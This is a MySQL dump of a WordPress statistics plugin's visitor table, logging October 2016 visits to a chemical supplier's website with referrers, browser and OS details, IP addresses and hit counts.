INSERT INTO `wp_statistics_visitor` VALUES (6049, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.186.45.155', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6050, '2016-10-19', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiLlN2J5-XPAhXqrlQKHaRxBbQQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Frelease-agents%2F&usg=AFQjCNHbwMDofHjUU2PB95SWZra5M3XNKA&sig2=r2Enum42vRI6X1pYKqmfNw&bvm=bv.135974163,d.cGw', 'MSIE', 'Windows', '11.0', '', '130.76.24.29', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6051, '2016-10-19', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '127.0.0.1', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6052, '2016-10-19', 'https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/', 'Chrome', 'Windows', '53.0.2785.143', '', '108.53.187.9', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6053, '2016-10-19', 'https://www.google.co.jp/', 'Safari', 'iPhone', '9.0', '', '142.244.5.207', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6054, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.143', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6055, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', '8.0', '', '91.134.1.133', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6056, '2016-10-19', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '119.129.108.35', '000', 29, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6057, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '199.107.68.202', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6058, '2016-10-19', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '199.107.68.202', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6059, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.211', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6060, '2016-10-19', 'https://www.miller-stephenson.com/opteon-sion-specialty-solvent/', 'MSIE', 'Windows', '9.0', '', '204.79.180.78', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6061, '2016-10-19', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.16', '', '119.128.172.172', '000', 29, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6062, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '175.197.148.112', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6063, '2016-10-19', 'https://www.thebatteryshow.com/visit/exhibitor-list/', 'MSIE', 'Windows', '9.0', '', '112.133.237.39', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6064, '2016-10-19', 'https://www.google.ca/', 'Edge', 'Windows', '14.14393', '', '162.157.173.118', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6065, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.122.29.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6066, '2016-10-19', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '58.217.157.187', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6067, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.45.116.107', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6068, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '128.174.133.145', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6069, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '62.210.181.123', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6070, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '23.0.1271.26', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6071, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.66.182.105', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6072, '2016-10-19', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '184.150.235.113', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6073, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.118', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6074, '2016-10-19', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '192.254.68.126', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6075, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.200.224.31', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6076, '2016-10-19', 'https://search.yahoo.co.jp/search?p=%E3%82%AF%E3%83%A9%E3%82%A4%E3%83%88%E3%83%83%E3%82%AF%E3%82%B9%EF%BC%92%EF%BC%94%EF%BC%90%EF%BC%A1%EF%BC%A3&aq=-1&ei=UTF-8&fr=top_ga1_sa&b=11', 'MSIE', 'Windows', '10.0', '', '58.92.247.231', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6077, '2016-10-19', 'https://www.google.co.id/', 'Chrome', 'Windows', '53.0.2785.143', '', '116.254.102.161', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6078, '2016-10-19', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '99.230.188.239', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6079, '2016-10-19', 'https://www.miller-stephenson.com/products/detail.aspx?itemid=62', 'MSIE', 'Windows', '9.0', '', '182.118.20.166', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6080, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.116', '', '73.84.206.12', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6081, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '49.0.2623.112', '', '24.124.32.40', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6082, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '67.1.240.16', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6083, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '207.118.98.106', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6084, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '97.80.158.67', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6085, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '24.125.186.45', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6086, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.59', '', '72.193.157.179', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6087, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '70.189.128.61', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6088, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '207.191.221.95', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6089, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '39.0.2171.99', '', '66.249.79.153', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6090, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '39.0.2171.99', '', '66.249.79.157', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6091, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '49.0.2623.112', '', '63.152.64.211', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6092, '2016-10-19', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.1.1', '', '104.32.173.56', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6093, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.222.176.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6094, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '165.91.13.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6095, '2016-10-19', 'https://www.miller-stephenson.com', 'testitest', 'Unknown', 'Unknown', '', '54.172.81.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6096, '2016-10-19', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.11.128.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6097, '2016-10-19', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '176.58.115.37', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6098, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '203.241.151.50', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6099, '2016-10-19', 'https://www.google.co.th/', 'Chrome', 'Windows', '53.0.2785.143', '', '113.53.146.165', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6100, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.231.214.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6101, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.22.55.191', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6102, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.180.154.3', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6103, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.114.191.207', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6104, '2016-10-19', 'https://www.google.co.jp/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwj0qOvSkebPAhUWwGMKHaAlB4oQFgg5MAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-240ac%2F&usg=AFQjCNGMGT-9sDD56bUfjS2_Mysw8RHfIA&bvm=bv.135974163,d.cGc', 'MSIE', 'Windows', '11.0', '', '221.254.46.37', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6105, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.175.3.254', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6106, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.202.255.134', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6107, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.133.162.65', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6108, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '39.47.92.103', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6109, '2016-10-19', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6110, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.135', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6111, '2016-10-19', 'https://vavilone.com/', 'MSIE', 'Windows', '6.0', '', '46.211.197.241', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6112, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.167.150.25', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6113, '2016-10-19', 'https://www.miller-stephenson.com/wp-login.php', 'Firefox', 'Windows', '34.0', '', '95.167.150.24', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6114, '2016-10-19', 'https://www.google.co.kr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=18&ved=0ahUKEwiVm8KZmebPAhWkjlQKHdc_CG84ChAWCGEwBw&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvazo-64-radical-initiator%2F&usg=AFQjCNFSn_9whraBhhuvpb2uyL5Gz7-R8Q&bvm=bv.135974163,d.c2I&cad=rjt', 'MSIE', 'Windows', '11.0', '', '61.83.220.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6115, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.87.224.60', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6116, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '46.4.22.136', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6117, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.191.20.129', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6118, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '14.36.156.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6119, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '80.64.29.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6120, '2016-10-19', 'https://www.google.com.tr/', 'Chrome', 'Windows', '53.0.2785.143', '', '88.241.43.251', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6121, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.107.127.148', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6122, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '54.183.161.216', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6123, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.202.1.200', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6124, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.195.183.248', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6125, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '180.252.53.184', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6126, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '91.223.72.80', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6127, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '52.0.2743.116', '', '54.67.114.148', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6128, '2016-10-19', 'https://www.google.pl/', 'Chrome', 'Windows', '53.0.2785.143', '', '91.223.72.80', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6129, '2016-10-19', 'https://www.google.co.in/', 'Chrome', 'Windows', '49.0.2623.112', '', '103.232.232.132', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6130, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '87.255.14.81', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6131, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.234.178.39', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6132, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.106', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6133, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.128.21.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6134, '2016-10-19', 'https://pharmacyincity.com/', 'Unknown', 'Unknown', 'Unknown', '', '46.118.118.216', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6135, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.24.186.103', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6136, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '91.200.12.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6137, '2016-10-19', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '158.69.237.99', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6138, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '202.65.158.54', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6139, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.126.95.28', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6140, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '82.193.155.227', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6141, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '84.52.76.211', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6142, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '23.0', '', '62.149.1.74', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6143, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.172.68.177', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6144, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '223.255.230.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6145, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '30.0.1599.69', '', '222.122.190.94', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6146, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '5.0', '', '146.120.158.23', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6147, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6a1pre', '', '31.148.246.115', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6148, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '3.6.9', '', '31.148.246.226', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6149, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '5.0', '', '146.120.166.253', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6150, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.154.73.150', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6151, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.200.195.229', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6152, '2016-10-19', 'https://www.miller-stephenson.com', 'Mechanize', 'Unknown', '2.7.3', '', '192.210.165.141', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6153, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.20.118.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6154, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.234.97.74', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6155, '2016-10-19', 'https://www.bing.com/search?&q=chem%C4%B1cal%20compan%C4%B1es%20ltd%20contact%20us%20mail&scope=web&setmkt=es-ES&setlang=match&first=401', 'MSIE', 'Windows', '11.0', '', '31.209.110.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6156, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '90.188.40.62', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6157, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.201.237.253', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6158, '2016-10-19', 'https://chcu.net/', 'MSIE', 'Windows', '5.0', '', '37.115.187.108', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6159, '2016-10-19', 'https://www.bioscorp.ru/', 'Opera', 'Windows', '8.00', '', '37.115.187.108', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6160, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.141', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6161, '2016-10-19', 'https://www.google.si/', 'Chrome', 'Android', '47.0.2526.83', '', '188.64.24.236', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6162, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.23.190.133', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6163, '2016-10-19', 'https://www.miller-stephenson.com/products/detail.aspx?itemid=61', 'MSIE', 'Windows', '9.0', '', '182.118.25.220', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6164, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.144.163.187', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6165, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.141.234.138', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6166, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '87.224.224.145', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6167, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '192.116.177.218', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6168, '2016-10-19', 'https://shmetall.com.ua/', 'Opera', 'Windows', '9.0', '', '46.118.155.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6169, '2016-10-19', 'https://www.google.pl/', 'Chrome', 'Windows', '53.0.2785.143', '', '87.204.169.234', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6170, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.21.8.19', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6171, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.12.224.162', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6172, '2016-10-19', 'https://mmr.mschem.com/miller/pdf/MS-760,%20762.pdf', 'Chrome', 'Windows', '53.0.2785.143', '', '197.156.64.247', '000', 29, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6173, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.72.105.27', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6174, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '192.99.147.201', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6175, '2016-10-19', 'https://www.miller-stephenson.com/epoxy-and-coatings/', 'MSIE', 'Windows', '9.0', '', '182.118.20.171', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6176, '2016-10-19', 'https://www.google.pl', 'Firefox', 'Windows', '43.0', '', '77.65.80.142', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6177, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.107.8.73', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6178, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.234.248.235', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6179, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '130.255.43.24', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6180, '2016-10-19', 'https://www.google.es/', 'Firefox', 'Macintosh', '48.0', '', '81.32.69.184', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6181, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.232.55.147', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6182, '2016-10-19', 'https://www.so.com/link?url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&q=WWW.MILLER-STEPHENSON.COM&ts=1476867387&t=2e278efb92b607f7c7787646c1570ae&src=haosou', 'Chrome', 'Windows', '45.0.2454.101', '', '121.34.174.86', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6183, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.46.54.253', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6184, '2016-10-19', 'https://www.miller-stephenson.com', 'testitest', 'Unknown', 'Unknown', '', '54.159.105.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6185, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.185.1.174', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6186, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '82.151.215.30', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6187, '2016-10-19', 'https://www.miller-stephenson.com', 'Opera Next', 'Windows', '36.0.2130.32', '', '46.119.127.129', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6188, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.87.127.224', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6189, '2016-10-19', 'https://ttsgco.blogfa.com/', 'Firefox', 'Windows', '49.0', '', '109.203.148.76', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6190, '2016-10-19', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '218.17.231.86', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6191, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.26.232.98', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6192, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.118.91.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6193, '2016-10-19', 'https://www.google.co.in/', 'Opera Next', 'Windows', '40.0.2308.81', '', '203.187.238.71', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6194, '2016-10-19', 'https://www.google.co.in', 'Firefox', 'Linux', '47.0', '', '115.178.100.17', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6195, '2016-10-19', 'https://www.miller-stephenson.com/', 'Firefox', 'Linux', '47.0', '', '115.248.35.13', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6196, '2016-10-19', 'https://www.google.co.in', 'Firefox', 'Linux', '47.0', '', '14.141.89.18', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6197, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '185.72.179.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6198, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '87.8.14.22', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6199, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.14', '000', 1, 0); 
